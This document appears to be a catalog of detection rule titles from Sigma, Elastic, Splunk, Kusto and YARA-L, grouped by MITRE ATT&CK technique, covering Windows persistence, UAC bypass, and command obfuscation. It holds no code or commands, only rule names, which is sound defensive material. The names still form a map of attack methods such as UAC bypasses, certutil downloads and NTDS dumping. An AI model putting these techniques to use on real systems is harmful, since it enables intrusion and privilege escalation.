- Sigma Potential Persistence Attempt Via Run Keys Using Reg.EXE test
- Elastic Potential Persistence via Mandatory User Profile production
- Splunk Potential Proxy Malware via AutoRun Key (PowerShell)
- Splunk Potential Proxy Malware via AutoRun Key (Sysmon)
- Splunk Potential Proxy Malware via AutoRun Key (Windows Event Log)
- Elastic Potential REMCOS Trojan Execution production
- Sigma Potential Ryuk Ransomware Activity stable
- Sigma Potential Startup Shortcut Persistence Via PowerShell.EXE test
- Sigma Potential Suspicious Activity Using SeCEdit test
- YARA-L Potential Suspicious Activity Using SeCEdit
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Splunk Registry Keys Used For Persistence production
- Sigma Registry Persistence via Explorer Run Key test
- Kusto Registry Run Keys - Suspicious Registry Run Keys
- Sigma Registry Set With Crypto-Classes From The "Cryptography" PowerShell Namespace test
- Sigma Session Manager Autorun Keys Modification test
- YARA-L Session Manager Autorun Keys Modification
- Splunk Shortcut Created in Startup Folder - Windows (PowerShell)
- Sigma Startup Folder File Write test
- Splunk Startup Folder Location Modified - Windows (PowerShell)
- Splunk Startup Folder Location Modified - Windows (Sysmon)
- Splunk Startup Folder Location Modified - Windows (Windows Event Log)
- Elastic Startup Folder Persistence via Unsigned Process production
- Elastic Startup or Run Key Registry Modification production
- Sigma Suspicious Autorun Registry Modified via WMI experimental
- Sigma Suspicious PowerShell In Registry Run Keys test
- YARA-L Suspicious Powershell In Registry Run Keys
- Splunk Suspicious Registry Key Created (PowerShell)
- Splunk Suspicious Registry Key Created (Windows Event Log)
- Sigma Suspicious Run Key from Download test
- Sigma Suspicious Startup Folder Persistence test
- Elastic Suspicious Startup Shell Folder Modification production
- Sigma Suspicious VBScript UN2452 Pattern test
- Sigma System Scripts Autorun Keys Modification test
- Elastic Uncommon Registry Persistence Change production
- Sigma User Shell Folders Registry Modification via CommandLine experimental
- Sigma VBScript Payload Stored in Registry test
- Splunk Windows Boot or Logon Autostart Execution In Startup Folder production
- Sigma Windows Event Log Access Tampering Via Registry experimental
- Splunk Windows NorthStar C2 Agent Execution production
- Splunk Windows PowerShell MSIX Package Installation production
- Splunk Windows Registry BootExecute Modification production
- Splunk Windows Registry Modification for Safe Mode Persistence production
- Sigma WinRAR Creating Files in Startup Locations experimental
- Sigma WinSock2 Autorun Keys Modification test
- Sigma Wow6432Node Classes Autorun Keys Modification test
- Splunk Wow6432Node Classes Autorun Keys Modification (PowerShell)
- Splunk Wow6432Node Classes Autorun Keys Modification (Sysmon)
- Splunk Wow6432Node Classes Autorun Keys Modification (Windows Event Log)
- Sigma Wow6432Node CurrentVersion Autorun Keys Modification test
- Sigma Wow6432Node Windows NT CurrentVersion Autorun Keys Modification test
Boot or Logon Autostart Execution: Authentication Package T1547.002 7 rules
- Splunk LSA Authentication Packages Registry Key Modified (PowerShell)
- Splunk LSA Authentication Packages Registry Key Modified (Sysmon)
- Splunk LSA Authentication Packages Registry Key Modified (Windows Event Log)
- Elastic Potential LSA Authentication Package Abuse production
- Splunk Potential LSA password filter (PowerShell)
- Splunk Potential LSA password filter (Windows Event Log)
- Sigma Potential Suspicious Activity Using SeCEdit test
Boot or Logon Autostart Execution: Time Providers T1547.003 3 rules
- Sigma New TimeProviders Registered With Uncommon DLL Name test
- Elastic Potential Persistence via Time Provider Modification production
- Splunk Time Provider Persistence Registry production
Boot or Logon Autostart Execution: Winlogon Helper DLL T1547.004 7 rules
- Elastic Persistence via WMI Standard Registry Provider production
- Splunk Unusual winlogon.exe Child Process (Sysmon)
- Splunk Unusual winlogon.exe Child Process (Windows Event Log)
- Sigma Winlogon Helper DLL test
- Sigma Winlogon Notify Key Logon Persistence test
- Splunk WinLogon Registry Key Modified (PowerShell)
- Splunk WinLogon Registry Key Modified (Sysmon)
Boot or Logon Autostart Execution: Security Support Provider T1547.005 5 rules
- Elastic Installation of Security Support Provider production
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma Security Support Provider (SSP) Added to LSA Configuration test
- Elastic Suspicious Module Loaded by LSASS production
- Splunk Windows Security Support Provider Reg Query production
Boot or Logon Autostart Execution: Kernel Modules and Extensions T1547.006 2 rules
- Splunk Windows Snake Malware Kernel Driver Comadmin production
- Splunk Windows Snake Malware Service Create production
Boot or Logon Autostart Execution: LSASS Driver T1547.008 4 rules
- Sigma DLL Load via LSASS test
- Sigma Security package (SSP) added (Reg via command) experimental
- Sigma Security package (SSP) loaded into LSA (native) experimental
- Splunk Windows Autostart Execution LSASS Driver Registry Modification production
Boot or Logon Autostart Execution: Shortcut Modification T1547.009 10 rules
- Sigma Creation Exe for Service with Unquoted Path test
- Sigma Desktop.INI Created by Uncommon Process test
- Sigma New Custom Shim Database Created test
- Sigma NTFS hard link creation experimental
- Sigma NTFS symbolic link configuration change experimental
- Sigma NTFS symbolic link creation experimental
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Splunk Symbolic OR Hard File Link Created (PowerShell)
- Splunk Symbolic OR Hard File Link Created (Windows Event Log)
- Sigma Windows Network Access Suspicious desktop.ini Action test
Boot or Logon Autostart Execution: Port Monitors T1547.010 11 rules
- Sigma Add Port Monitor Persistence in Registry test
- Sigma Bypass UAC Using Event Viewer test
- Sigma Default RDP Port Changed to Non Standard Port test
- YARA-L Default RDP Port Changed to Non Standard Port
- Splunk Monitor Registry Keys for Print Monitors production
- Elastic Potential Port Monitor or Print Processor Registration Abuse production
- Sigma Potential Suspicious Activity Using SeCEdit test
- Sigma Print spooler privilege escalation via printer added (CVE-2020-1048) experimental
- Splunk Rare dll called by Spoolsv.exe (Windows Event Log)
- Sigma SystemNightmare by GentilKiwi - External printer mapped (CVE-2021-1675 / CVE-2021-34527) experimental
- Sigma SystemNightmare by GentilKiwi - New external device added (CVE-2021-1675 / CVE-2021-34527) experimental
Boot or Logon Autostart Execution: Print Processors T1547.012 8 rules
- Elastic Potential Port Monitor or Print Processor Registration Abuse production
- Splunk Print Processor Registry Autostart production
- Splunk Print Spooler Adding A Printer Driver production
- Splunk Print Spooler Failed to Load a Plug-in production
- Splunk Spoolsv Spawning Rundll32 production
- Splunk Spoolsv Suspicious Loaded Modules production
- Splunk Spoolsv Writing a DLL production
- Splunk Spoolsv Writing a DLL - Sysmon production
Boot or Logon Autostart Execution: Active Setup T1547.014 4 rules
- Splunk Active Setup Registry Autostart production
- Sigma Potential Suspicious Activity Using SeCEdit test
- Elastic Uncommon Registry Persistence Change production
- Splunk Windows Audit Policy Auditing Option Modified - Registry production
Abuse Elevation Control Mechanism T1548 120 rules
- Sigma Abused Debug Privilege by Arbitrary Parent Processes test
- Splunk Allow Operation with Consent Admin production
- Sigma Always Install Elevated MSI Spawned Cmd And Powershell test
- Sigma Always Install Elevated Windows Installer test
- Sigma Bypass UAC Using DelegateExecute test
- Sigma Bypass UAC Using SilentCleanup Task test
- Sigma Bypass UAC via CMSTP test
- Elastic Bypass UAC via Event Viewer production
- Sigma Bypass UAC via Fodhelper.exe test
- Sigma Bypass UAC via WSReset.exe test
- Sigma CMSTP UAC Bypass via COM Object Access stable
- Sigma COM Hijack via Sdclt test
- Splunk ComputerDefaults UAC Bypass (PowerShell)
- Splunk ComputerDefaults UAC Bypass (Sysmon)
- Splunk ComputerDefaults UAC Bypass (Windows Event Log)
- Splunk ConsentPromptBehaviorAdmin Registry Value Modified (PowerShell)
- Splunk ConsentPromptBehaviorAdmin Registry Value Modified (Sysmon)
- Splunk ConsentPromptBehaviorAdmin Registry Value Modified (Windows Event Log)
- Sigma Credential Dumping Attempt Via Svchost test
- Splunk Disable UAC Remote Restriction production
- Splunk Disabling Remote User Account Control production
- Elastic Disabling User Account Control via Registry Modification production
- Splunk EnableLUA Registry Value Modified (PowerShell)
- Splunk EnableLUA Registry Value Modified (Sysmon)
- Splunk EnableLUA Registry Value Modified (Windows Event Log)
- Splunk Eventvwr UAC Bypass production
- Sigma Explorer NOUACCHECK Flag test
- Splunk FodHelper UAC Bypass production
- Sigma Function Call From Undocumented COM Interface EditionUpgradeManager test
- Sigma HackTool - Empire PowerShell UAC Bypass stable
- Sigma HackTool - UACMe Akagi Execution test
- Sigma HackTool - WinPwn Execution test
- Sigma HackTool - WinPwn Execution - ScriptBlock test
- Splunk Indirect Command Execution (Sysmon)
- Splunk Indirect Command Execution (Windows Event Log)
- Elastic Local Account TokenFilter Policy Disabled production
- Splunk Mock System Directory - Windows (Sysmon)
- Splunk Mock System Directory - Windows (Windows Event Log)
- Splunk NET Profiler UAC bypass production
- Sigma Potential Exploitation of CVE-2025-5054 or CVE-2025-4598 experimental
- Kusto Potential Fodhelper UAC Bypass available
- Kusto Potential Fodhelper UAC Bypass (ASIM Version)
- Splunk Potential fodhelper UAC Bypass Attempt (PowerShell)
- Splunk Potential fodhelper UAC Bypass Attempt (Sysmon)
- Splunk Potential fodhelper UAC Bypass Attempt (Windows Event Log)
- Sigma Potential Privilege Escalation via Local Kerberos Relay over LDAP test
- Sigma Potential UAC Bypass Via Sdclt.EXE test
- Sigma Potentially Suspicious Event Viewer Child Process test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma PowerShell Web Access Feature Enabled Via DISM test
- Splunk PromptOnSecureDesktop Registry Value Modified (PowerShell)
- Splunk PromptOnSecureDesktop Registry Value Modified (Sysmon)
- Splunk PromptOnSecureDesktop Registry Value Modified (Windows Event Log)
- Sigma Regedit as Trusted Installer test
- Sigma Registry Modification of MS-settings Protocol Handler test
- Sigma SCM Database Privileged Operation test
- Sigma Sdclt Child Processes test
- Splunk Sdclt UAC Bypass production
- Splunk Services Escalate Exe production
- Sigma Shell Open Registry Keys Manipulation test
- Splunk SilentCleanup UAC Bypass production
- Splunk SLUI RunAs Elevated production
- Splunk SLUI Spawning a Process production
- Sigma Sudo Privilege Escalation CVE-2019-14287 test
- Splunk Suspicious ComputerDefaults.exe Execution (Sysmon)
- Splunk Suspicious ComputerDefaults.exe Execution (Windows Event Log)
- Sigma Suspicious Shell Open Command Registry Modification experimental
- Sigma Trusted Path Bypass via Windows Directory Spoofing experimental
- Sigma TrustedPath UAC Bypass Pattern test
- Sigma UAC Bypass Abusing Winsat Path Parsing - File test
- Sigma UAC Bypass Abusing Winsat Path Parsing - Process test
- Sigma UAC Bypass Abusing Winsat Path Parsing - Registry test
- Elastic UAC Bypass Attempt via Elevated COM Internet Explorer Add-On Installer production
- Elastic UAC Bypass Attempt via Windows Directory Masquerading production
- Elastic UAC Bypass Attempt with IEditionUpgradeManager Elevated COM Interface production
- Splunk UAC Bypass MMC Load Unsigned Dll production
- Sigma UAC Bypass Tools Using ComputerDefaults test
- Sigma UAC Bypass Using .NET Code Profiler on MMC test
- Sigma UAC Bypass Using ChangePK and SLUI test
- Sigma UAC Bypass Using Consent and Comctl32 - File test
- Sigma UAC Bypass Using Consent and Comctl32 - Process test
- Sigma UAC Bypass Using Disk Cleanup test
- Sigma UAC Bypass Using DismHost test
- Sigma UAC Bypass Using IDiagnostic Profile test
- Sigma UAC Bypass Using IDiagnostic Profile - File test
- Sigma UAC Bypass Using IEInstal - File test
- Sigma UAC Bypass Using IEInstal - Process test
- Sigma UAC Bypass Using Iscsicpl - ImageLoad test
- Sigma UAC Bypass Using MSConfig Token Modification - File test
- Sigma UAC Bypass Using MSConfig Token Modification - Process test
- Sigma UAC Bypass Using NTFS Reparse Point - File test
- Sigma UAC Bypass Using NTFS Reparse Point - Process test
- Sigma UAC Bypass Using PkgMgr and DISM test
- Sigma UAC Bypass Using Windows Media Player - File test
- Sigma UAC Bypass Using Windows Media Player - Process test
- Sigma UAC Bypass Using Windows Media Player - Registry test
- Sigma UAC Bypass Using WOW64 Logger DLL Hijack test
- Elastic UAC Bypass via DiskCleanup Scheduled Task Hijack production
- Sigma UAC Bypass via Event Viewer test
- Sigma UAC Bypass via ICMLuaUtil test
- Elastic UAC Bypass via ICMLuaUtil Elevated COM Interface production
- Sigma UAC Bypass via Sdclt test
- Sigma UAC Bypass via Windows Firewall Snap-In Hijack test
- Elastic UAC Bypass via Windows Firewall Snap-In Hijack production
- Sigma UAC Bypass Via Wsreset test
- Sigma UAC Bypass With Fake DLL test
- Sigma UAC Bypass WSReset test
- Sigma UAC Disabled stable
- Sigma UAC Notification Disabled test
- Sigma UAC Secure Desktop Prompt Disabled test
- Splunk Windows Bypass UAC via Pkgmgr Tool production
- Splunk Windows ComputerDefaults Spawning a Process production
- Splunk Windows DISM Install PowerShell Web Access production
- Splunk Windows Mock Trusted Directory MSC File Creation production
- Splunk Windows Privilege Escalation Suspicious Process Elevation production
- Splunk Windows Privilege Escalation System Process Without System Parent production
- Splunk Windows Privilege Escalation User Process Spawn System Process production
- Splunk Windows UAC Bypass Suspicious Child Process production
- Splunk Windows UAC Bypass Suspicious Escalation Behavior production
- Splunk WSReset UAC Bypass production
Abuse Elevation Control Mechanism: Bypass User Account Control T1548.002 104 rules
- Sigma Always Install Elevated MSI Spawned Cmd And Powershell test
- Sigma Always Install Elevated Windows Installer test
- Sigma Bypass UAC Using DelegateExecute test
- Sigma Bypass UAC Using SilentCleanup Task test
- Sigma Bypass UAC via CMSTP test
- Elastic Bypass UAC via Event Viewer production
- Sigma Bypass UAC via Fodhelper.exe test
- Sigma Bypass UAC via WSReset.exe test
- Sigma CMSTP UAC Bypass via COM Object Access stable
- Splunk ComputerDefaults UAC Bypass (PowerShell)
- Splunk ComputerDefaults UAC Bypass (Sysmon)
- Splunk ComputerDefaults UAC Bypass (Windows Event Log)
- Splunk ConsentPromptBehaviorAdmin Registry Value Modified (PowerShell)
- Splunk ConsentPromptBehaviorAdmin Registry Value Modified (Sysmon)
- Splunk ConsentPromptBehaviorAdmin Registry Value Modified (Windows Event Log)
- Splunk Disable UAC Remote Restriction production
- Splunk Disabling Remote User Account Control production
- Elastic Disabling User Account Control via Registry Modification production
- Splunk EnableLUA Registry Value Modified (PowerShell)
- Splunk EnableLUA Registry Value Modified (Sysmon)
- Splunk EnableLUA Registry Value Modified (Windows Event Log)
- Splunk Eventvwr UAC Bypass production
- Sigma Explorer NOUACCHECK Flag test
- Splunk FodHelper UAC Bypass production
- Sigma Function Call From Undocumented COM Interface EditionUpgradeManager test
- Sigma HackTool - Empire PowerShell UAC Bypass stable
- Sigma HackTool - UACMe Akagi Execution test
- Sigma HackTool - WinPwn Execution test
- Sigma HackTool - WinPwn Execution - ScriptBlock test
- Elastic Local Account TokenFilter Policy Disabled production
- Splunk Mock System Directory - Windows (Sysmon)
- Splunk Mock System Directory - Windows (Windows Event Log)
- Splunk NET Profiler UAC bypass production
- Kusto Potential Fodhelper UAC Bypass available
- Kusto Potential Fodhelper UAC Bypass (ASIM Version)
- Splunk Potential fodhelper UAC Bypass Attempt (PowerShell)
- Splunk Potential fodhelper UAC Bypass Attempt (Sysmon)
- Splunk Potential fodhelper UAC Bypass Attempt (Windows Event Log)
- Sigma Potential UAC Bypass Via Sdclt.EXE test
- Sigma Potentially Suspicious Event Viewer Child Process test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma PowerShell Web Access Feature Enabled Via DISM test
- Splunk PromptOnSecureDesktop Registry Value Modified (PowerShell)
- Splunk PromptOnSecureDesktop Registry Value Modified (Sysmon)
- Splunk PromptOnSecureDesktop Registry Value Modified (Windows Event Log)
- Sigma Registry Modification of MS-settings Protocol Handler test
- Sigma Sdclt Child Processes test
- Splunk Sdclt UAC Bypass production
- Sigma Shell Open Registry Keys Manipulation test
- Splunk SilentCleanup UAC Bypass production
- Splunk SLUI RunAs Elevated production
- Splunk SLUI Spawning a Process production
- Splunk Suspicious ComputerDefaults.exe Execution (Sysmon)
- Splunk Suspicious ComputerDefaults.exe Execution (Windows Event Log)
- Sigma Suspicious Shell Open Command Registry Modification experimental
- Sigma Trusted Path Bypass via Windows Directory Spoofing experimental
- Sigma TrustedPath UAC Bypass Pattern test
- Sigma UAC Bypass Abusing Winsat Path Parsing - File test
- Sigma UAC Bypass Abusing Winsat Path Parsing - Process test
- Sigma UAC Bypass Abusing Winsat Path Parsing - Registry test
- Elastic UAC Bypass Attempt via Elevated COM Internet Explorer Add-On Installer production
- Elastic UAC Bypass Attempt via Windows Directory Masquerading production
- Elastic UAC Bypass Attempt with IEditionUpgradeManager Elevated COM Interface production
- Splunk UAC Bypass MMC Load Unsigned Dll production
- Sigma UAC Bypass Tools Using ComputerDefaults test
- Sigma UAC Bypass Using .NET Code Profiler on MMC test
- Sigma UAC Bypass Using ChangePK and SLUI test
- Sigma UAC Bypass Using Consent and Comctl32 - File test
- Sigma UAC Bypass Using Consent and Comctl32 - Process test
- Sigma UAC Bypass Using Disk Cleanup test
- Sigma UAC Bypass Using DismHost test
- Sigma UAC Bypass Using IDiagnostic Profile test
- Sigma UAC Bypass Using IDiagnostic Profile - File test
- Sigma UAC Bypass Using IEInstal - File test
- Sigma UAC Bypass Using IEInstal - Process test
- Sigma UAC Bypass Using Iscsicpl - ImageLoad test
- Sigma UAC Bypass Using MSConfig Token Modification - File test
- Sigma UAC Bypass Using MSConfig Token Modification - Process test
- Sigma UAC Bypass Using NTFS Reparse Point - File test
- Sigma UAC Bypass Using NTFS Reparse Point - Process test
- Sigma UAC Bypass Using PkgMgr and DISM test
- Sigma UAC Bypass Using Windows Media Player - File test
- Sigma UAC Bypass Using Windows Media Player - Process test
- Sigma UAC Bypass Using Windows Media Player - Registry test
- Sigma UAC Bypass Using WOW64 Logger DLL Hijack test
- Elastic UAC Bypass via DiskCleanup Scheduled Task Hijack production
- Sigma UAC Bypass via Event Viewer test
- Sigma UAC Bypass via ICMLuaUtil test
- Elastic UAC Bypass via ICMLuaUtil Elevated COM Interface production
- Sigma UAC Bypass via Sdclt test
- Elastic UAC Bypass via Windows Firewall Snap-In Hijack production
- Sigma UAC Bypass Via Wsreset test
- Sigma UAC Bypass With Fake DLL test
- Sigma UAC Bypass WSReset test
- Sigma UAC Disabled stable
- Sigma UAC Notification Disabled test
- Sigma UAC Secure Desktop Prompt Disabled test
- Splunk Windows Bypass UAC via Pkgmgr Tool production
- Splunk Windows ComputerDefaults Spawning a Process production
- Splunk Windows DISM Install PowerShell Web Access production
- Splunk Windows Mock Trusted Directory MSC File Creation production
- Splunk Windows UAC Bypass Suspicious Child Process production
- Splunk Windows UAC Bypass Suspicious Escalation Behavior production
- Splunk WSReset UAC Bypass production
Abuse Elevation Control Mechanism: Sudo and Sudo Caching T1548.003 1 rule
- Sigma Sudo Privilege Escalation CVE-2019-14287 test
Escape to Host T1611 2 rules
- Kusto Oracle suspicious command execution available
- Kusto SQL Server spawning suspicious child process
Stealth
Direct Volume Access T1006 3 rules
- Elastic NTDS Dump via Wbadmin production
- Sigma Potential Defense Evasion Via Raw Disk Access By Uncommon Tools test
- Elastic Symbolic Link to Shadow Copy Created production
Rootkit T1014 2 rules
- Splunk Windows Driver Load Non-Standard Path production
- Splunk Windows Drivers Loaded by Signature production
Obfuscated Files or Information T1027 200 rules
- Sigma Base64 Encoded PowerShell Command Detected test
- Kusto Base64 encoded Windows process command-lines available
- Kusto Base64 encoded Windows process command-lines (Normalized Process Events)
- Elastic Binary Content Copy via Cmd.exe production
- Sigma Certificate Exported Via Certutil.EXE test
- Splunk Certutil Execution (Sysmon)
- Splunk Certutil Execution (Windows Event Log)
- Splunk Certutil File Download (PowerShell)
- Splunk Certutil File Download (Sysmon)
- Splunk Certutil File Download (Windows Event Log)
- Splunk Certutil Obfuscate_Encode Files (EDR)
- Splunk Certutil Obfuscate_Encode Files (PowerShell)
- Splunk Certutil Obfuscate_Encode Files (Sysmon)
- Splunk Certutil Obfuscate_Encode Files (Windows Event Log)
- Splunk Command Line Homoglyphs - Windows (PowerShell)
- Splunk Command Line Homoglyphs - Windows (Sysmon)
- Splunk Command Line Homoglyphs - Windows (Windows Event Log)
- Elastic Command Obfuscation via Unicode Modifier Letters production
- Splunk Compressed File Execution (Windows Event Log)
- Sigma ConvertTo-SecureString Cmdlet Usage Via CommandLine test
- Splunk CSC Execution (EDR)
- Splunk CSC Execution (Windows Event Log)
- Splunk CSC Net On The Fly Compilation production
- Sigma Csc.EXE Execution Form Potentially Suspicious Parent test
- Splunk Curl Execution with Percent Encoded URL production
- Elastic Deprecated - Encoded Executable Stored in the Registry production
- Splunk DLL Concatenation (PowerShell)
- Splunk DLL Concatenation (Sysmon)
- Splunk DLL Concatenation (Windows Event Log)
- Sigma Dynamic .NET Compilation Via Csc.EXE test
- Sigma Dynamic .NET Compilation Via Csc.EXE - Hunting test
- Sigma Dynamic CSharp Compile Artefact test
- Elastic Dynamic IEX Reconstruction via Method String Access production
- Splunk Encoded Powershell Command (PowerShell)
- Splunk Encoded Powershell Command (Sysmon)
- Splunk Encoded Powershell Command (Windows Event Log)
- Sigma Encoded PowerShell payload deployed (PowerShell) experimental
- Sigma Encoded PowerShell payload deployed via process execution experimental
- Sigma Encoded PowerShell payload deployed via service experimental
- Sigma Failed Code Integrity Checks stable
- Elastic File Compressed or Archived into Common Format by Unsigned Process production
- Sigma File Decoded From Base64/Hex Via Certutil.EXE test
- Sigma File Encoded To Base64 Via Certutil.EXE test
- Sigma File In Suspicious Location Encoded To Base64 Via Certutil.EXE test
- Sigma Findstr Launching .lnk File test
- Sigma HackTool - CrackMapExec PowerShell Obfuscation test
- Splunk Impacket atexec.py Execution (PowerShell)
- Splunk Impacket atexec.py Execution (Sysmon)
- Splunk Impacket atexec.py Execution (Windows Event Log)
- Splunk Impacket atexec.py Scheduled Task Creation (Windows Event Log)
- Splunk Impacket atexec.py Temp File Creation (Sysmon)
- Splunk Impacket atexec.py Temp File Creation (Windows Event Log)
- Kusto Ingress Tool Transfer - Certutil available
- Sigma Invocation Of Crypto-Classes From The "Cryptography" PowerShell Namespace test
- Sigma Invoke-Obfuscation CLIP+ Launcher test
- Sigma Invoke-Obfuscation CLIP+ Launcher - PowerShell test
- Sigma Invoke-Obfuscation CLIP+ Launcher - PowerShell Module test
- Sigma Invoke-Obfuscation CLIP+ Launcher - Security test
- Sigma Invoke-Obfuscation CLIP+ Launcher - System test
- Sigma Invoke-Obfuscation COMPRESS OBFUSCATION test
- Sigma Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell test
- Sigma Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell Module test
- Sigma Invoke-Obfuscation COMPRESS OBFUSCATION - Security test
- Sigma Invoke-Obfuscation COMPRESS OBFUSCATION - System test
- Sigma Invoke-Obfuscation Obfuscated IEX Invocation test
- Sigma Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell test
- Sigma Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell Module test
- Sigma Invoke-Obfuscation Obfuscated IEX Invocation - Security test
- Sigma Invoke-Obfuscation Obfuscated IEX Invocation - System test
- Sigma Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell test
- Sigma Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell Module test
- Sigma Invoke-Obfuscation RUNDLL LAUNCHER - Security test
- Sigma Invoke-Obfuscation RUNDLL LAUNCHER - System test
- Sigma Invoke-Obfuscation STDIN+ Launcher test
- Sigma Invoke-Obfuscation STDIN+ Launcher - Powershell test
- Sigma Invoke-Obfuscation STDIN+ Launcher - PowerShell Module test
- Sigma Invoke-Obfuscation STDIN+ Launcher - Security test
- Sigma Invoke-Obfuscation STDIN+ Launcher - System test
- Sigma Invoke-Obfuscation VAR+ Launcher test
- Sigma Invoke-Obfuscation VAR+ Launcher - PowerShell test
- Sigma Invoke-Obfuscation VAR+ Launcher - PowerShell Module test
- Sigma Invoke-Obfuscation VAR+ Launcher - Security test
- Sigma Invoke-Obfuscation VAR+ Launcher - System test
- Sigma Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION test
- Sigma Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell test
- Sigma Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell Module test
- Sigma Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - Security test
- Sigma Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - System test
- Sigma Invoke-Obfuscation Via Stdin test
- Sigma Invoke-Obfuscation Via Stdin - Powershell test
- Sigma Invoke-Obfuscation Via Stdin - PowerShell Module test
- Sigma Invoke-Obfuscation Via Stdin - Security test
- Sigma Invoke-Obfuscation Via Stdin - System test
- Sigma Invoke-Obfuscation Via Use Clip test
- Sigma Invoke-Obfuscation Via Use Clip - Powershell test
- Sigma Invoke-Obfuscation Via Use Clip - PowerShell Module test
- Sigma Invoke-Obfuscation Via Use Clip - Security test
- Sigma Invoke-Obfuscation Via Use Clip - System test
- Sigma Invoke-Obfuscation Via Use MSHTA test
- Sigma Invoke-Obfuscation Via Use MSHTA - PowerShell test
- Sigma Invoke-Obfuscation Via Use MSHTA - PowerShell Module test
- Sigma Invoke-Obfuscation Via Use MSHTA - Security test
- Sigma Invoke-Obfuscation Via Use MSHTA - System test
- Sigma Invoke-Obfuscation Via Use Rundll32 - PowerShell test
- Sigma Invoke-Obfuscation Via Use Rundll32 - PowerShell Module test
- Sigma Invoke-Obfuscation Via Use Rundll32 - Security test
- Sigma Invoke-Obfuscation Via Use Rundll32 - System test
- Splunk Malicious PowerShell Process - Encoded Command production
- Kusto NRT Base64 Encoded Windows Process Command-lines available
- Kusto NRT Process executed from binary hidden in Base64 encoded file available
- Sigma Obfuscated payload transfered via service name - Tchopper (command) experimental
- Sigma Obfuscated PowerShell MSI Install via WindowsInstaller COM experimental
- Splunk Obfuscated Powershell Techniques (PowerShell)
- Sigma Operation Wocao Activity test
- Sigma Operation Wocao Activity - Security test
- Sigma Password Protected ZIP File Opened test
- Sigma Password Protected ZIP File Opened (Email Attachment) test
- Sigma Password Protected ZIP File Opened (Suspicious Filenames) test
- Sigma Ping Hex IP test
- Sigma Potential Application Whitelisting Bypass via Dnx.EXE test
- Sigma Potential CommandLine Obfuscation Using Unicode Characters test
- Sigma Potential CommandLine Obfuscation Using Unicode Characters From Suspicious Image test
- Elastic Potential Dynamic IEX Reconstruction via Environment Variables production
- Sigma Potential Emotet Activity stable
- Sigma Potential Encoded PowerShell Patterns In CommandLine test
- Sigma Potential Obfuscated Ordinal Call Via Rundll32 test
- Sigma Potential PowerShell Command Line Obfuscation test
- Sigma Potential PowerShell Obfuscation Using Alias Cmdlets test
- Sigma Potential PowerShell Obfuscation Using Character Join test
- Elastic Potential PowerShell Obfuscation via Backtick-Escaped Variable Expansion production
- Elastic Potential PowerShell Obfuscation via Character Array Reconstruction production
- Elastic Potential PowerShell Obfuscation via Concatenated Dynamic Command Invocation production
- Elastic Potential PowerShell Obfuscation via High Numeric Character Proportion production
- Elastic Potential PowerShell Obfuscation via High Special Character Proportion production
- Elastic Potential PowerShell Obfuscation via Invalid Escape Sequences production
- Elastic Potential PowerShell Obfuscation via Reverse Keywords production
- Sigma Potential PowerShell Obfuscation Via Reversed Commands test
- Elastic Potential PowerShell Obfuscation via Special Character Overuse production
- Elastic Potential PowerShell Obfuscation via String Concatenation production
- Elastic Potential PowerShell Obfuscation via String Reordering production
- Sigma Potential PowerShell Obfuscation Via WCHAR/CHAR test
- Sigma Potential Secure Deletion with SDelete test
- Sigma Potential Suspicious Execution From GUID Like Folder Names test
- Sigma Potential Winnti Dropper Activity test
- Sigma Potentially Suspicious Long Filename Pattern - Linux experimental
- Sigma PowerShell Base64 Encoded Invoke Keyword test
- Sigma PowerShell Base64 Encoded Reflective Assembly Load test
- Sigma PowerShell Base64 Encoded WMI Classes test
- Splunk PowerShell CreateDecryptor (PowerShell)
- Splunk PowerShell CreateDecryptor (Sysmon)
- Splunk PowerShell CreateDecryptor (Windows Event Log)
- Splunk Powershell Creating Thread Mutex production
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Splunk Powershell Enable SMB1Protocol Feature production
- Splunk Powershell Fileless Script Contains Base64 Encoded Content production
- Elastic PowerShell Obfuscation via Negative Index String Reversal production
- Sigma Powershell Token Obfuscation - Powershell test
- Sigma Powershell Token Obfuscation - Process Creation test
- Splunk PowerShell WebRequest Using Memory Stream production
- Kusto Process Creation with Suspicious CommandLine Arguments available
- Kusto Process executed from binary hidden in Base64 encoded file available
- Sigma PUA - DefenderCheck Execution test
- Sigma PUA - Potential PE Metadata Tamper Using Rcedit test
- Sigma Python Image Load By Non-Python Process test
- Sigma Python One-Liners with Base64 Decoding experimental
- Sigma Registry Set With Crypto-Classes From The "Cryptography" PowerShell Namespace test
- Sigma Renamed AutoIt Execution test
- Elastic Suspicious .NET Code Compilation production
- Splunk Suspicious csc.exe Source File Folder (Sysmon)
- Splunk Suspicious csc.exe Source File Folder (Windows Event Log)
- Sigma Suspicious Download Via Certutil.EXE test
- YARA-L Suspicious Download Via Certutil.EXE
- Sigma Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call test
- Elastic Suspicious Execution with NodeJS production
- Sigma Suspicious Explorer Process with Whitespace Padding - ClickFix/FileFix experimental
- Sigma Suspicious File Downloaded From Direct IP Via Certutil.EXE test
- Sigma Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE test
- YARA-L Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE
- Sigma Suspicious File Encoded To Base64 Via Certutil.EXE test
- Sigma Suspicious Get-Variable.exe Creation test
- Elastic Suspicious HTML File Creation production
- Elastic Suspicious JavaScript Execution via Deno production
- Sigma Suspicious Space Characters in RunMRU Registry Path - ClickFix experimental
- Sigma Suspicious Space Characters in TypedPaths Registry Path - FileFix experimental
- Sigma Suspicious SYSTEM User Process Creation test
- Sigma Suspicious Usage of For Loop with Recursive Directory Search in CMD experimental
- Elastic Suspicious Windows Command Shell Arguments production
- Elastic Suspicious Windows Powershell Arguments production
- Sigma Suspicious XOR Encoded PowerShell Command test
- Kusto TEARDROP memory-only dropper available
